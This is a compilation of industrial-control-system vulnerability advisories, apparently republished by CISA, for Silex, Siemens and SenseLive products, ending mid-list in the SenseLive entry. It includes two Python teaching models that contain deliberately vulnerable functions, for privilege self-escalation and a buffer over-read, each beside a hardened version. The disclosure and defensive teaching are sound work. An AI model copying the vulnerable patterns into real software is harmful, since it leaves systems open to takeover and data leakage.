View CVE Details Affected Products Silex Technology SD-330AC and AMC Manager Vendor: Silex Technology Product Version: Silex Technology SD-330AC: <=1.42, Silex Technology AMC Manager: <=5.0.2 Product Status: known_affected Remediations Vendor fix The developer has released the following versions to address this vulnerability: SD-330AC firmware Ver 1.50 or later Vendor fix AMC Manager Ver.5.1.0 or later Mitigation For more information, see Silex Technology's security advisory in English (https://www.silex.jp/support/security-advisories/en/2026-001) or in Japanese (https://www.silex.jp/support/security-advisories/2026-001). https://www.silex.jp/support/security-advisories/en/2026-001 Mitigation For more information, see Silex Technology's security advisory in English (https://www.silex.jp/support/security-advisories/en/2026-001) or in Japanese (https://www.silex.jp/support/security-advisories/2026-001). https://www.silex.jp/support/security-advisories/2026-001 Mitigation For more information, see JPCERT/CC vulnerability notes in English (https://jvn.jp/en/vu/JVNVU94271449/) or in Japanese (https://jvn.jp/vu/JVNVU94271449/). https://jvn.jp/en/vu/JVNVU94271449/ Mitigation For more information, see JPCERT/CC vulnerability notes in English (https://jvn.jp/en/vu/JVNVU94271449/) or in Japanese (https://jvn.jp/vu/JVNVU94271449/). https://jvn.jp/vu/JVNVU94271449/ Relevant CWE: CWE-306 Missing Authentication for Critical Function Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N CVE-2024-24487 An issue discovered in Silex Technology DS-600 Firmware v.1.4.1 allows a remote attacker to cause a denial of service via crafted UDP packets using the EXEC REBOOT SYSTEM command. 
View CVE Details Affected Products Silex Technology SD-330AC and AMC Manager Vendor: Silex Technology Product Version: Silex Technology SD-330AC: <=1.42, Silex Technology AMC Manager: <=5.0.2 Product Status: known_affected Remediations Vendor fix The developer has released the following versions to address this vulnerability: SD-330AC firmware Ver 1.50 or later Vendor fix AMC Manager Ver.5.1.0 or later Mitigation For more information, see Silex Technology's security advisory in English (https://www.silex.jp/support/security-advisories/en/2026-001) or in Japanese (https://www.silex.jp/support/security-advisories/2026-001). https://www.silex.jp/support/security-advisories/en/2026-001 Mitigation For more information, see Silex Technology's security advisory in English (https://www.silex.jp/support/security-advisories/en/2026-001) or in Japanese (https://www.silex.jp/support/security-advisories/2026-001). https://www.silex.jp/support/security-advisories/2026-001 Mitigation For more information, see JPCERT/CC vulnerability notes in English (https://jvn.jp/en/vu/JVNVU94271449/) or in Japanese (https://jvn.jp/vu/JVNVU94271449/). https://jvn.jp/en/vu/JVNVU94271449/ Mitigation For more information, see JPCERT/CC vulnerability notes in English (https://jvn.jp/en/vu/JVNVU94271449/) or in Japanese (https://jvn.jp/vu/JVNVU94271449/). https://jvn.jp/vu/JVNVU94271449/ Relevant CWE: CWE-266 Incorrect Privilege Assignment Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.8 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:H CVE-2026-32963 An Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Silex Technology SD-330AC and AMC Manager could allow an attacker to trick a user into accessing a special web page and execute arbitrary script on the user's browser. 
View CVE Details Affected Products Silex Technology SD-330AC and AMC Manager Vendor: Silex Technology Product Version: Silex Technology SD-330AC: <=1.42, Silex Technology AMC Manager: <=5.0.2 Product Status: known_affected Remediations Vendor fix The developer has released the following versions to address this vulnerability: SD-330AC firmware Ver 1.50 or later Vendor fix AMC Manager Ver.5.1.0 or later Mitigation CVE-2026-32955, CVE-2026-32956, CVE-2026-32957, and CVE-2026-32963: Disable HTTP/HTTPS service. Mitigation For more information, see Silex Technology's security advisory in English (https://www.silex.jp/support/security-advisories/en/2026-001) or in Japanese (https://www.silex.jp/support/security-advisories/2026-001). https://www.silex.jp/support/security-advisories/en/2026-001 Mitigation For more information, see Silex Technology's security advisory in English (https://www.silex.jp/support/security-advisories/en/2026-001) or in Japanese (https://www.silex.jp/support/security-advisories/2026-001). https://www.silex.jp/support/security-advisories/2026-001 Mitigation For more information, see JPCERT/CC vulnerability notes in English (https://jvn.jp/en/vu/JVNVU94271449/) or in Japanese (https://jvn.jp/vu/JVNVU94271449/). https://jvn.jp/en/vu/JVNVU94271449/ Mitigation For more information, see JPCERT/CC vulnerability notes in English (https://jvn.jp/en/vu/JVNVU94271449/) or in Japanese (https://jvn.jp/vu/JVNVU94271449/). https://jvn.jp/vu/JVNVU94271449/ Relevant CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N CVE-2026-32964 An Improper Neutralization of CRLF Sequences ('CRLF Injection') vulnerability in Silex Technology SD-330AC and AMC Manager could allow an attacker to inject arbitrary entries into the system configuration. 
View CVE Details Affected Products Silex Technology SD-330AC and AMC Manager Vendor: Silex Technology Product Version: Silex Technology SD-330AC: <=1.42, Silex Technology AMC Manager: <=5.0.2 Product Status: known_affected Remediations Vendor fix The developer has released the following versions to address this vulnerability: SD-330AC firmware Ver 1.50 or later Vendor fix AMC Manager Ver.5.1.0 or later Mitigation For more information, see Silex Technology's security advisory in English (https://www.silex.jp/support/security-advisories/en/2026-001) or in Japanese (https://www.silex.jp/support/security-advisories/2026-001). https://www.silex.jp/support/security-advisories/en/2026-001 Mitigation For more information, see Silex Technology's security advisory in English (https://www.silex.jp/support/security-advisories/en/2026-001) or in Japanese (https://www.silex.jp/support/security-advisories/2026-001). https://www.silex.jp/support/security-advisories/2026-001 Mitigation For more information, see JPCERT/CC vulnerability notes in English (https://jvn.jp/en/vu/JVNVU94271449/) or in Japanese (https://jvn.jp/vu/JVNVU94271449/). https://jvn.jp/en/vu/JVNVU94271449/ Mitigation For more information, see JPCERT/CC vulnerability notes in English (https://jvn.jp/en/vu/JVNVU94271449/) or in Japanese (https://jvn.jp/vu/JVNVU94271449/). https://jvn.jp/vu/JVNVU94271449/ Relevant CWE: CWE-93 Improper Neutralization of CRLF Sequences ('CRLF Injection') Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L CVE-2026-32965 An Initialization of a Resource with an Insecure Default vulnerability in Silex Technology SD-330AC and AMC Manager could allow an attacker using the factory default configuration to configure the device using the null string password. 
View CVE Details Affected Products Silex Technology SD-330AC and AMC Manager Vendor: Silex Technology Product Version: Silex Technology SD-330AC: <=1.42, Silex Technology AMC Manager: <=5.0.2 Product Status: known_affected Remediations Vendor fix The developer has released the following versions to address this vulnerability: SD-330AC firmware Ver 1.50 or later Vendor fix AMC Manager Ver.5.1.0 or later Mitigation CVE-2026-32958 and CVE-2026-32965: Set a password for the settings web interface. Mitigation For more information, see Silex Technology's security advisory in English (https://www.silex.jp/support/security-advisories/en/2026-001) or in Japanese (https://www.silex.jp/support/security-advisories/2026-001). https://www.silex.jp/support/security-advisories/en/2026-001 Mitigation For more information, see Silex Technology's security advisory in English (https://www.silex.jp/support/security-advisories/en/2026-001) or in Japanese (https://www.silex.jp/support/security-advisories/2026-001). https://www.silex.jp/support/security-advisories/2026-001 Mitigation For more information, see JPCERT/CC vulnerability notes in English (https://jvn.jp/en/vu/JVNVU94271449/) or in Japanese (https://jvn.jp/vu/JVNVU94271449/). https://jvn.jp/en/vu/JVNVU94271449/ Mitigation For more information, see JPCERT/CC vulnerability notes in English (https://jvn.jp/en/vu/JVNVU94271449/) or in Japanese (https://jvn.jp/vu/JVNVU94271449/). https://jvn.jp/vu/JVNVU94271449/ Relevant CWE: CWE-1188 Initialization of a Resource with an Insecure Default Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N Acknowledgments Francesco La Spina of Forescout Technologies reported these vulnerabilities to CISA Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). 
Recommended Practices CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolating them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. CISA also recommends users take the following measures to protect themselves from social engineering attacks: Do not click web links or open attachments in unsolicited email messages. Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams. Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks. 
No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time.
Revision History
Initial Release Date: 2026-04-21
2026-04-21, Revision 1: Initial Publication

Siemens RUGGEDCOM CROSSBOW Secure Access Manager Primary

Summary: RUGGEDCOM CROSSBOW Secure Access Manager Primary (SAM-P) contains a vulnerability that could allow an attacker to escalate their own privileges. Siemens has released a new version for RUGGEDCOM CROSSBOW Secure Access Manager Primary (SAM-P) and recommends updating to the latest version.
The following versions of Siemens RUGGEDCOM CROSSBOW Secure Access Manager Primary are affected:
RUGGEDCOM CROSSBOW Secure Access Manager Primary (SAM-P) vers:intdot/<5.8 (CVE-2026-27668)
CVSS v3: 8.8
Vendor: Siemens
Equipment: Siemens RUGGEDCOM CROSSBOW Secure Access Manager Primary
Vulnerabilities: Incorrect Privilege Assignment
Background
Critical Infrastructure Sectors: Critical Manufacturing
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Germany
Vulnerabilities
CVE-2026-27668: User Administrators are allowed to administer groups they belong to. This could allow an authenticated User Administrator to escalate their own privileges and grant themselves access to any device group at any access level.
Affected Products: Siemens RUGGEDCOM CROSSBOW Secure Access Manager Primary
Vendor: Siemens
Product Version: RUGGEDCOM CROSSBOW Secure Access Manager Primary (SAM-P)
Product Status: known_affected
Remediations
Vendor fix: Update to V5.8 or later version (https://support.industry.siemens.com/cs/ww/en/view/110000841/)
Relevant CWE: CWE-266 Incorrect Privilege Assignment
Metrics: CVSS Version 3.1, Base Score 8.8, Base Severity HIGH, Vector String CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Acknowledgments: Siemens ProductCERT reported this vulnerability to CISA.
General Recommendations
As a general security measure, Siemens strongly recommends protecting network access to devices with appropriate mechanisms.
In order to operate the devices in a protected IT environment, Siemens recommends configuring the environment according to Siemens' operational guidelines for Industrial Security (Download: https://www.siemens.com/cert/operational-guidelines-industrial-security) and following the recommendations in the product manuals. Additional information on Industrial Security by Siemens can be found at: https://www.siemens.com/industrialsecurity
Additional Resources: For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories
Terms of Use: The use of Siemens Security Advisories is subject to the terms and conditions listed on: https://www.siemens.com/productcert/terms-of-use.
Legal Notice and Terms of Use: This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).
Recommended Practices: CISA's standard defensive measures for control systems apply to this advisory; they are reproduced in full under the Silex Technology SD-330AC and AMC Manager advisory above and at cisa.gov/ics.
Advisory Conversion Disclaimer: This ICSA is a verbatim republication of Siemens ProductCERT SSA-741509 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory.
Revision History
Initial Release Date: 2026-04-14
2026-04-14, Revision 1: Publication Date
2026-04-21, Revision 2: Initial CISA Republication of Siemens ProductCERT SSA-741509 advisory
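The CVE-2026-27668 entry above describes a separation-of-duty failure: the authorization check only asks "does this user administer the group?", and because a User Administrator may also be a member of that group, any change they make feeds straight back into their own effective rights. The following added example is written for this page and is not Siemens code; it models that check in Python with a hypothetical data model. The class names (Directory, AccessLevel), the function names, the access levels VIEWER/OPERATOR/ADMIN, and the users and groups in the constructed scenario are all assumptions, not SAM-P's real API. It also goes one step beyond the advisory text by closing the two-step variant (grant a level to a group you do not yet belong to, then add yourself), which is why the hardened membership edit refuses self-addition as well.

```python
from dataclasses import dataclass, field
from enum import IntEnum


class AccessLevel(IntEnum):
    """Hypothetical access levels on a device group (not SAM-P's real levels)."""
    NONE = 0
    VIEWER = 1
    OPERATOR = 2
    ADMIN = 3


class AuthorizationError(PermissionError):
    pass


@dataclass
class Directory:
    """Hypothetical directory model: who administers which user groups, who belongs to them,
    and which access level each user group holds on each device group."""
    user_admins: dict[str, set[str]]                   # user -> user groups they administer
    members: dict[str, set[str]]                       # user group -> its users
    device_access: dict[str, dict[str, AccessLevel]] = field(default_factory=dict)  # user group -> device group -> level

    def groups_of(self, user: str) -> set[str]:
        return {g for g, users in self.members.items() if user in users}

    def effective_access(self, user: str, device_group: str) -> AccessLevel:
        """Highest level the user reaches through any group they belong to."""
        return max((self.device_access.get(g, {}).get(device_group, AccessLevel.NONE)
                    for g in self.groups_of(user)), default=AccessLevel.NONE)


def _require_admin(d: Directory, actor: str, group: str) -> None:
    if group not in d.user_admins.get(actor, set()):
        raise AuthorizationError(f"{actor} does not administer {group}")


def _require_not_own_group(d: Directory, actor: str, group: str) -> None:
    # Separation of duty: no administrator may change a group that defines their own rights.
    if group in d.groups_of(actor):
        raise AuthorizationError(f"{actor} belongs to {group} and may not administer it")


# Modelled on the advisory: only "does the actor administer this group?" is checked.
def set_access_vulnerable(d, actor, group, device_group, level):
    _require_admin(d, actor, group)
    d.device_access.setdefault(group, {})[device_group] = level


def add_member_vulnerable(d, actor, group, user):
    _require_admin(d, actor, group)
    d.members.setdefault(group, set()).add(user)


# Hardened: access-level and membership edits both exclude the actor's own groups, and an
# administrator cannot add themselves, which closes the "set the level, then join" route.
def set_access_fixed(d, actor, group, device_group, level):
    _require_admin(d, actor, group)
    _require_not_own_group(d, actor, group)
    d.device_access.setdefault(group, {})[device_group] = level


def add_member_fixed(d, actor, group, user):
    _require_admin(d, actor, group)
    _require_not_own_group(d, actor, group)
    if user == actor:
        raise AuthorizationError(f"{actor} may not add themselves to {group}")
    d.members.setdefault(group, set()).add(user)


def fresh_directory() -> Directory:
    """Constructed scenario: 'mallory' administers 'field-techs' (which she belongs to) and
    'auditors' (which she does not); she currently has VIEWER on 'substation-rtus'."""
    return Directory(
        user_admins={"mallory": {"field-techs", "auditors"}},
        members={"field-techs": {"mallory", "alice"}, "auditors": {"bob"}},
        device_access={"field-techs": {"substation-rtus": AccessLevel.VIEWER}},
    )


def demo():
    """Returns mallory's access on 'substation-rtus' after (a) the vulnerable direct path,
    (b) the vulnerable two-step path via 'auditors', (c) the hardened code, plus the number
    of hardened calls that were refused."""
    d = fresh_directory()
    set_access_vulnerable(d, "mallory", "field-techs", "substation-rtus", AccessLevel.ADMIN)
    direct = d.effective_access("mallory", "substation-rtus")

    d = fresh_directory()
    set_access_vulnerable(d, "mallory", "auditors", "substation-rtus", AccessLevel.ADMIN)
    add_member_vulnerable(d, "mallory", "auditors", "mallory")
    two_step = d.effective_access("mallory", "substation-rtus")

    d = fresh_directory()
    set_access_fixed(d, "mallory", "auditors", "substation-rtus", AccessLevel.ADMIN)  # allowed: not her group
    refused = 0
    for call in (lambda: set_access_fixed(d, "mallory", "field-techs", "substation-rtus", AccessLevel.ADMIN),
                 lambda: add_member_fixed(d, "mallory", "auditors", "mallory")):
        try:
            call()
        except AuthorizationError:
            refused += 1
    hardened = d.effective_access("mallory", "substation-rtus")
    return direct, two_step, hardened, refused


if __name__ == "__main__":
    print(demo())
```

The hardened rule is deliberately coarse: an administrator simply cannot touch a group they belong to, and cannot place themselves into any group. A finer policy (for example, allowing edits that can only lower the actor's own rights) is possible but needs a proof that no sequence of allowed edits raises the actor's effective access, which is exactly what the simple rule gives for free.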

Siemens TPM 2.0

Summary: The products listed below contain a vulnerability that could allow an attacker to perform an out-of-bounds read, potentially leading to information disclosure or denial of service of the TPM. Siemens has released new versions for several affected products and recommends updating to the latest versions. Siemens is preparing further fix versions and recommends countermeasures for products where fixes are not, or not yet, available.
The following versions of Siemens TPM 2.0 are affected:
SIMATIC CN 4100 vers:all/* (CVE-2025-2884)
SIMATIC Field PG M5 vers:all/* (CVE-2025-2884)
SIMATIC Field PG M6 vers:all/* (CVE-2025-2884)
SIMATIC IPC BX-32A vers:intdot/<29.01.09 (CVE-2025-2884)
SIMATIC IPC BX-39A vers:intdot/<29.01.09 (CVE-2025-2884)
SIMATIC IPC BX-56A vers:intdot/<32.01.09 (CVE-2025-2884)
SIMATIC IPC BX-59A vers:intdot/<32.01.09 (CVE-2025-2884)
SIMATIC IPC MD-57A vers:intdot/<30.01.10 (CVE-2025-2884)
SIMATIC IPC PX-32A vers:intdot/<29.01.09 (CVE-2025-2884)
SIMATIC IPC PX-39A vers:intdot/<29.01.09 (CVE-2025-2884)
SIMATIC IPC PX-39A PRO vers:intdot/<29.01.09 (CVE-2025-2884)
SIMATIC IPC RW-528A vers:intdot/<34.01.02 (CVE-2025-2884)
SIMATIC IPC RW-548A vers:intdot/<34.01.02 (CVE-2025-2884)
SIMATIC IPC227E vers:all/* (CVE-2025-2884)
SIMATIC IPC277E vers:all/* (CVE-2025-2884)
SIMATIC IPC427E vers:intdot/<21.01.20 (CVE-2025-2884)
SIMATIC IPC477E vers:intdot/<21.01.20 (CVE-2025-2884)
SIMATIC IPC477E PRO vers:intdot/<21.01.20 (CVE-2025-2884)
SIMATIC IPC627E vers:all/* (CVE-2025-2884)
SIMATIC IPC647E vers:all/* (CVE-2025-2884)
SIMATIC IPC677E vers:all/* (CVE-2025-2884)
SIMATIC IPC847E vers:all/* (CVE-2025-2884)
SIMATIC ITP1000 vers:all/* (CVE-2025-2884)
SIPLUS IPC427E vers:intdot/<21.01.20 (CVE-2025-2884)
CVSS v3: 6.6
Vendor: Siemens
Equipment: Siemens TPM 2.0
Vulnerabilities: Out-of-bounds Read
Background
Critical Infrastructure Sectors: Critical Manufacturing
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Germany
Vulnerabilities
CVE-2025-2884: The TCG TPM 2.0 reference implementation's CryptHmacSign helper function is vulnerable to an out-of-bounds read because it does not validate the signature scheme against the signing key's algorithm. See Errata Revision 1.83 and advisory TCGVRT0009 for the TCG standard TPM 2.0.
Affected Products: Siemens TPM 2.0
Vendor: Siemens
Product Version: SIMATIC CN 4100, SIMATIC Field PG M5, SIMATIC Field PG M6, SIMATIC IPC BX-32A, SIMATIC IPC BX-39A, SIMATIC IPC BX-56A, SIMATIC IPC BX-59A, SIMATIC IPC MD-57A, SIMATIC IPC PX-32A, SIMATIC IPC PX-39A, SIMATIC IPC PX-39A PRO, SIMATIC IPC RW-528A, SIMATIC IPC RW-548A, SIMATIC IPC227E, SIMATIC IPC277E, SIMATIC IPC427E, SIMATIC IPC477E, SIMATIC IPC477E PRO, SIMATIC IPC627E, SIMATIC IPC647E, SIMATIC IPC677E, SIMATIC IPC847E, SIMATIC ITP1000, SIPLUS IPC427E
Product Status: known_affected
Remediations
No fix planned: Currently no fix is planned
None available: Currently no fix is available
Vendor fix: Update to V21.01.20 or later version (https://support.industry.siemens.com/cs/ww/en/view/109763408/)
Vendor fix: Update to V29.01.09 or later version (https://support.industry.siemens.com/cs/ww/en/view/109763408/)
Vendor fix: Update to V30.01.10 or later version (https://support.industry.siemens.com/cs/ww/en/view/109763408/)
Vendor fix: Update to V32.01.09 or later version (https://support.industry.siemens.com/cs/ww/en/view/109763408/)
Vendor fix: Update to V34.01.02 or later version (https://support.industry.siemens.com/cs/ww/en/view/109763408/)
Relevant CWE: CWE-125 Out-of-bounds Read
Metrics: CVSS Version 3.1, Base Score 6.6, Base Severity MEDIUM, Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:H
Acknowledgments: Siemens ProductCERT reported this vulnerability to CISA.
General Recommendations
As a general security measure, Siemens strongly recommends protecting network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends configuring the environment according to Siemens' operational guidelines for Industrial Security (Download: https://www.siemens.com/cert/operational-guidelines-industrial-security) and following the recommendations in the product manuals. Additional information on Industrial Security by Siemens can be found at: https://www.siemens.com/industrialsecurity
Additional Resources: For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories
Terms of Use: The use of Siemens Security Advisories is subject to the terms and conditions listed on: https://www.siemens.com/productcert/terms-of-use.
Legal Notice and Terms of Use: This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).
Recommended Practices: CISA's standard defensive measures for control systems apply to this advisory; they are reproduced in full under the Silex Technology SD-330AC and AMC Manager advisory above and at cisa.gov/ics.
Advisory Conversion Disclaimer: This ICSA is a verbatim republication of Siemens ProductCERT SSA-628843 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory.
Revision History
Initial Release Date: 2026-04-14
2026-04-14, Revision 1: Publication Date
2026-04-21, Revision 2: Initial CISA Republication of Siemens ProductCERT SSA-628843 advisory
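The CVE-2025-2884 entry is an instance of a recurring bug class: a length used for a read is derived from a caller-chosen parameter (the signature scheme's hash algorithm) rather than from the object that owns the buffer (the signing key and the TPM2B it is asked to sign), so a mismatched scheme makes the helper consume bytes past the valid size. The following added example is written for this page; it is not TCG reference code or Siemens code, and it simplifies the data flow rather than reproducing CryptHmacSign line by line. Only the TPM_ALG_ID values and digest sizes are taken from the TCG registry; the Tpm2bDigest, KeyedHashKey and HmacScheme classes, the use of Python's hmac module in place of the TPM's internal HMAC, the TPM_RC_* messages and the 0xAA "stale memory" fill are assumptions made for the model.

```python
import hmac
from dataclasses import dataclass

# Real TPM_ALG_ID values and digest sizes from the TCG Algorithm Registry.
TPM_ALG_SHA1, TPM_ALG_SHA256, TPM_ALG_SHA384, TPM_ALG_SHA512 = 0x0004, 0x000B, 0x000C, 0x000D
DIGEST_SIZE = {TPM_ALG_SHA1: 20, TPM_ALG_SHA256: 32, TPM_ALG_SHA384: 48, TPM_ALG_SHA512: 64}
HASH_NAME = {TPM_ALG_SHA1: "sha1", TPM_ALG_SHA256: "sha256", TPM_ALG_SHA384: "sha384", TPM_ALG_SHA512: "sha512"}
MAX_DIGEST = 64  # a TPM2B_DIGEST buffer is sized for the largest supported digest


class TpmError(Exception):
    """Modelled TPM response code; a real TPM returns numeric TPM_RC values."""


@dataclass
class Tpm2bDigest:
    """Model of TPM2B_DIGEST: a fixed-capacity buffer of which only the first `size` bytes are valid."""
    size: int
    buffer: bytearray  # always MAX_DIGEST bytes long

    @classmethod
    def of(cls, valid: bytes, stale_fill: int = 0x00) -> "Tpm2bDigest":
        # `stale_fill` stands in for whatever earlier use left in the buffer (constructed for the demo).
        buf = bytearray([stale_fill]) * MAX_DIGEST
        buf[: len(valid)] = valid
        return cls(len(valid), buf)


@dataclass
class KeyedHashKey:
    """Model of a keyed-hash (HMAC) signing key bound to one hash algorithm at creation."""
    hash_alg: int
    secret: bytes


@dataclass
class HmacScheme:
    """Model of the caller-supplied signature scheme for an HMAC signature."""
    hash_alg: int


def crypt_hmac_sign_vulnerable(key, scheme, hash_data):
    """Modelled on the advisory text: the caller's scheme, not the key, decides how many bytes
    are read from `hash_data`. Returns (signature, bytes_read)."""
    n = DIGEST_SIZE[scheme.hash_alg]
    if n > len(hash_data.buffer):
        raise MemoryError("modelled read past the end of the TPM2B (crash / denial of service)")
    message = bytes(hash_data.buffer[:n])  # reads past hash_data.size whenever n is larger
    return hmac.new(key.secret, message, HASH_NAME[scheme.hash_alg]).digest(), n


def crypt_hmac_sign_fixed(key, scheme, hash_data):
    """Hardened form: the scheme must match the key's algorithm, and the read length comes from
    the object's own size field, never from the caller's scheme. Returns (signature, bytes_read)."""
    if scheme.hash_alg != key.hash_alg:
        raise TpmError("TPM_RC_SCHEME: signature scheme does not match the key's hash algorithm")
    if not 0 < hash_data.size <= len(hash_data.buffer):
        raise TpmError("TPM_RC_SIZE: digest size is outside the TPM2B buffer")
    message = bytes(hash_data.buffer[: hash_data.size])
    return hmac.new(key.secret, message, HASH_NAME[key.hash_alg]).digest(), hash_data.size


def demo():
    """Constructed scenario: a SHA-1 key is asked to sign a 20-byte digest under a SHA-512 scheme.
    Returns (bytes read by the vulnerable path, bytes read by the fixed path with the matching
    scheme, whether the fixed path rejected the mismatched scheme, the stale bytes the
    vulnerable path pulled into the signed message)."""
    key = KeyedHashKey(TPM_ALG_SHA1, b"constructed-demo-secret")
    digest = Tpm2bDigest.of(bytes(range(20)), stale_fill=0xAA)
    _, read_vuln = crypt_hmac_sign_vulnerable(key, HmacScheme(TPM_ALG_SHA512), digest)
    _, read_ok = crypt_hmac_sign_fixed(key, HmacScheme(TPM_ALG_SHA1), digest)
    try:
        crypt_hmac_sign_fixed(key, HmacScheme(TPM_ALG_SHA512), digest)
        rejected = False
    except TpmError:
        rejected = True
    leaked = bytes(digest.buffer[digest.size:read_vuln])
    return read_vuln, read_ok, rejected, leaked


if __name__ == "__main__":
    print(demo())
```

In the model the over-read stays inside the 64-byte TPM2B, so its visible effect is a signature computed over stale bytes (the information-disclosure outcome named in the summary); in C the same pattern against a smaller allocation is the crash outcome. The fix is two checks, not one: the scheme must agree with the key, and the byte count must come from the size field of the structure being read.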

SenseLive X3050

Summary: Successful exploitation of these vulnerabilities could allow an attacker to take complete control of the device.
The following versions of SenseLive X3050 are affected:
X3050 V1.523 (CVE-2026-40630, CVE-2026-25720, CVE-2026-35503, CVE-2026-39462, CVE-2026-27843, CVE-2026-40431, CVE-2026-40623, CVE-2026-27841, CVE-2026-40620, CVE-2026-35064, CVE-2026-25775)
CVSS v3: 9.8
Vendor: SenseLive
Equipment: SenseLive X3050
Vulnerabilities: Authentication Bypass Using an Alternate Path or Channel, Insufficient Session Expiration, Use of Hard-coded Credentials, Insufficiently Protected Credentials, Missing Authentication for Critical Function, Cleartext Transmission of Sensitive Information, Missing Authorization, Cross-Site Request Forgery (CSRF)
Background
Critical Infrastructure Sectors: Critical Manufacturing, Water and Wastewater, Energy, Information Technology
Countries/Areas Deployed: Worldwide
Company Headquarters Location: India
Affected Products (for every CVE below): SenseLive X3050
Vendor: SenseLive
Product Version: SenseLive X3050: V1.523
Product Status: known_affected
Remediations (for every CVE below)
Mitigation: SenseLive did not respond to CISA's requests to coordinate. Affected users are encouraged to reach out to SenseLive for more information (https://senselive.io/contact).
Vulnerabilities
CVE-2026-40630: A vulnerability in the X3050's web management interface allows unauthorized access to certain configuration endpoints due to improper access control enforcement. An attacker with network access to the device may be able to bypass the intended authentication mechanism and directly interact with sensitive configuration functions.
Relevant CWE: CWE-288 Authentication Bypass Using an Alternate Path or Channel
Metrics: CVSS Version 3.1, Base Score 9.8, Base Severity CRITICAL, Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE-2026-25720: A vulnerability exists in the X3050's web management interface due to improper session lifetime enforcement, allowing authenticated sessions to remain active for extended periods without requiring re-authentication. An attacker with access to a previously authenticated session could continue interacting with administrative functions long after legitimate user activity has ceased.
Relevant CWE: CWE-613 Insufficient Session Expiration
Metrics: CVSS Version 3.1, Base Score 5.4, Base Severity MEDIUM, Vector String CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
CVE-2026-35503: A vulnerability in the X3050's web management interface allows authentication logic to be performed entirely on the client side, relying on hardcoded values within browser-executed scripts rather than server-side verification. An attacker with access to the login page could retrieve these exposed parameters and gain unauthorized access to administrative functionality.
Relevant CWE: CWE-798 Use of Hard-coded Credentials
Metrics: CVSS Version 3.1, Base Score 9.8, Base Severity CRITICAL, Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE-2026-39462: A vulnerability exists in the X3050's web management interface in which password updates are not reliably applied due to improper handling of credential changes on the backend. After the device undergoes a factory restore using the SenseLive Config 2.0 tool, the interface may indicate that the password update was successful; however, the system may continue to accept the previous or default credentials, demonstrating that the password-change process is not consistently enforced. Even after a factory reset, attempted password changes may fail to propagate correctly.
Relevant CWE: CWE-522 Insufficiently Protected Credentials
Metrics: CVSS Version 3.1, Base Score 8.1, Base Severity HIGH, Vector String CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE-2026-27843: A vulnerability exists in the X3050's web management interface that allows critical configuration parameters to be modified without sufficient authentication or server-side validation. By applying unsupported or disruptive values to recovery mechanisms and network settings, an attacker can induce a persistent lockout state. Because the device lacks a physical reset button, recovery requires specialized technical access via the console to perform a factory reset, resulting in a total denial-of-service for the gateway and its connected RS-485 downstream systems.
Relevant CWE: CWE-306 Missing Authentication for Critical Function
